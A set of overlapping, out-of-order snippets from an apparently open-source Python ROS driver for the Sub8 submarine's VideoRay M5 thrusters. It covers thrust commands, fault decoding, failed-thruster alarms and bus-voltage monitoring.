"# Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions)",
"= \"Specify a path to the configuration.json file containing the thrust calibration data\"",
"= [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args =",
"May 2017, this is just a simple rolling average with a constant width",
"self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm",
"- David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT',",
"self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict",
"sense (the M5's will give nonsense feedback at times) if voltage >= self.VMIN",
"# So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So",
"Example names are BLR, FLH, etc. Raises RuntimeError if a thrust value outside",
"# Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust,",
"configuration data and make it available to other nodes - Instantiate ThrusterPorts, (Either",
"is None: raise IOError('/thruster_layout rosparam needs to be set before launching the thruster",
"Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ ==",
"give nonsense feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX:",
"self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def",
"def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage",
"before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) #",
"= ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm):",
"self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer",
"AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in",
"in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters",
"to do anything if the thruster status is bad if thruster_status is None:",
"alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands):",
"sure to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm()",
"message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving",
"# Thruster came online # Don't try to do anything if the thruster",
"keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage',",
"faults are unreliable (might not still be true - David) if message_keyword_args['fault'] >",
"cleared this alarm, we need to make sure to raise it again if",
"fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout",
"not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears",
"= [] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer '''",
"for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam",
"back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates",
"(failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters):",
"= target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) #",
"({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding",
"thrusters - Gather configuration data and make it available to other nodes -",
"again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises",
"To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster,",
"there are any updates to the list of failed thrusters, it will raise",
"registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path =",
"Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools",
"from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class",
"rosparam needs to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'],",
"of the particular thruster ''' self.failed_thrusters = set() # This is only determined",
"VideoRay M5 thrusters\" desc_msg = \"Specify a path to the configuration.json file containing",
"self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if severity",
"even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix",
"fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args))",
"rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name",
"!= 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault",
"code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {}",
"thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to",
"= [] for code, fault_name in fault_codes.items(): if code & fault != 0:",
"a thruster unavailable for thrust allocation ''' # So that thrust is not",
"# So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv):",
"= voltage self.t = time def __init__(self, window_duration): ''' window_duration - float (amount",
"fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code",
"# volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t =",
"'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for",
"< thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of",
"usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path",
"if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in",
"ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock",
"or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust",
"a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map =",
"self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage",
"for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver:",
"] message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] *",
"configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is offline",
"Adds voltage readings to buffer ''' voltage = float(voltage) # Only add if",
"of May 2017, this is just a simple rolling average with a constant",
"4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = []",
"force command (in Newtons) to a named thruster Example names are BLR, FLH,",
"Feedback on thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service",
"the window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now() -",
"if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands",
"accordingly Sets the severity to the number of failed thrusters (clipped at 5)",
"= 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver,",
"one for each thruster If there are any updates to the list of",
"the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter",
"we need to make sure to raise it again if not alarm.raised and",
"names to the appropriate port - Given a command message, route that command",
"readings to buffer ''' voltage = float(voltage) # Only add if it makes",
"to the number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters)",
"describing the status of the particular thruster ''' self.failed_thrusters = set() # This",
"''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly",
"port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake)",
"time): self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration -",
"class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of May",
"and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might",
"parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self,",
"if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm()",
"+ name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back",
"VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v =",
"Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map",
"wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before",
"!= severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity )",
"this alarm, we need to make sure to raise it again if not",
"These will not come back online even if comms are good (user managed)",
"make it available to other nodes - Instantiate ThrusterPorts, (Either simulated or real),",
"'offline_thruster_names' parameter accordingly Sets the severity to the number of failed thrusters (clipped",
"in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power,",
"command message, route that command to the appropriate port/thruster - Send a thruster",
"self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if comms are",
"thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect",
"thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get",
"name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can",
"self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before:",
"parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout =",
"passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings",
"'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in",
"rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter)",
"went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not",
"r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and",
"comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions,",
"- Track a thrust_dict, which maps thruster names to the appropriate port -",
"None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage':",
"rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds",
"with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): '''",
"object for commanding all of the sub's thrusters - Gather configuration data and",
"1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): '''",
"import copy import rospy import rospkg import rosparam import threading import argparse from",
"port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {}",
"> self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages",
"fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation ''' # So",
"some settings to take effect def get_thruster_info(self, srv): ''' Get the thruster info",
"thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm(",
"and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try",
"prune_buffer(self): ''' Removes readings older than the window_duration from buffer ''' for reading",
"{}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to",
"1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4):",
"return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name)",
"is just a simple rolling average with a constant width sliding window. However",
"in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for",
"[] for code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name)",
"require this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() #",
"thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside",
"that is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port",
"thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be",
"if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name))",
"self.deactivated_thrusters = set() # These will not come back online even if comms",
"VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t = time def __init__(self,",
"a a force command (in Newtons) to a named thruster Example names are",
"= rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout,",
"+ thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id,",
"self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity",
"name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0],",
"mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from",
"0 thrust to all thrusters ''' for port in self.ports.values(): for thruster_name in",
"import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's",
"thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {}",
"# We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track",
"''' Returns average voltage in buffer ''' voltages = [] if len(self.buffer) ==",
"if a thruster that is offline is commanded a non-zero thrust ''' port_name",
"''' Commands 0 thrust to all thrusters ''' for port in self.ports.values(): for",
"self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a",
"parameter '/simulate'\") # Instantiate thruster comms port for port_info in ports_layout: port_name =",
"'''Thruster driver, an object for commanding all of the sub's thrusters - Gather",
"to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters']) rospy.spin()",
"if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status,",
"that it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) #",
"return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ]",
"thrust to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) #",
"driver, an object for commanding all of the sub's thrusters - Gather configuration",
"to the appropriate port - Given a command message, route that command to",
"def get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster name",
"self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock)",
"port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to",
"ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster,",
"that estimates sub8's thruster bus voltage. As of May 2017, this is just",
"= {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False)",
"all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0)",
"port - Given a command message, route that command to the appropriate port/thruster",
"= rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter",
"updates to the list of failed thrusters, it will raise and alarm '''",
"needed ''' VMAX = 50 # volts VMIN = 0 # volts class",
"- Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track",
"to make sure to raise it again if not alarm.raised and alarm.node_name !=",
"{ (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT',",
"raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self):",
"self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} #",
"info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return",
"5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names},",
"rolling average with a constant width sliding window. However add_reading and get_estimate methods",
"a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name]",
"rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\")",
"settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' +",
"for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster",
"= AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage =",
"thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds",
"name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and",
"a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster",
"numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from",
"self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate',",
"std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param,",
"message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1):",
"is commanded Raises UnavailableThrusterException if a thruster that is offline is commanded a",
"for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port",
"unreliable (might not still be true - David) if message_keyword_args['fault'] > 2: fault_codes",
"simulated or real), for communicating with thrusters - Track a thrust_dict, which maps",
"voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)",
"if bus_voltage < self.kill_voltage: severity = 5 if severity is not None and",
"{}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect",
"rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based",
"port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self, srv): '''",
"list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters ==",
"#!/usr/bin/env python import numpy as np import copy import rospy import rospkg import",
"s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions):",
"direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this",
"or real), for communicating with thrusters - Track a thrust_dict, which maps thruster",
"BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically",
"if the thruster status is bad if thruster_status is None: return message_contents =",
"commanding non-zero thrust to offline thruster (' + name + ')') effort =",
"service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage",
"are unreliable (might not still be true - David) if message_keyword_args['fault'] > 2:",
"Raises RuntimeError if a thrust value outside of the configured thrust bounds is",
"bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable",
"''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__",
"rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id']",
"layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if",
"has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object):",
"bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if",
"(Either simulated or real), for communicating with thrusters - Track a thrust_dict, which",
"thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and configure if",
"in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the",
"in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters",
"configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not",
"44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD =",
"= {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack",
"average with a constant width sliding window. However add_reading and get_estimate methods are",
"for some settings to take effect def get_thruster_info(self, srv): ''' Get the thruster",
"max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else",
"in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed",
"updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of",
"port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0]",
"instructions, one for each thruster If there are any updates to the list",
"volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v",
"''' voltages = [] if len(self.buffer) == 0: return None for r in",
"AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster",
"calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout'",
"# These will not come back online even if comms are good (user",
"0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings to",
"non-zero thrust to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust)",
"RuntimeError if a thrust value outside of the configured thrust bounds is commanded",
"0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): '''",
"len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def",
"from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import",
"{key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus(",
"which to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub",
"'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key",
"number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters)",
"{} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's",
"= rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all",
"''' Get the thruster info for a particular thruster name ''' query_name =",
"2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1",
"the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to",
"= 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify",
"rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require",
"thruster_definitions): '''Thruster driver, an object for commanding all of the sub's thrusters -",
"someone else cleared this alarm, we need to make sure to raise it",
"VMAX = 50 # volts VMIN = 0 # volts class VoltageReading(object): def",
"self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def",
"{}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for",
"= list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5)))",
"thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server",
"a thrust value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException",
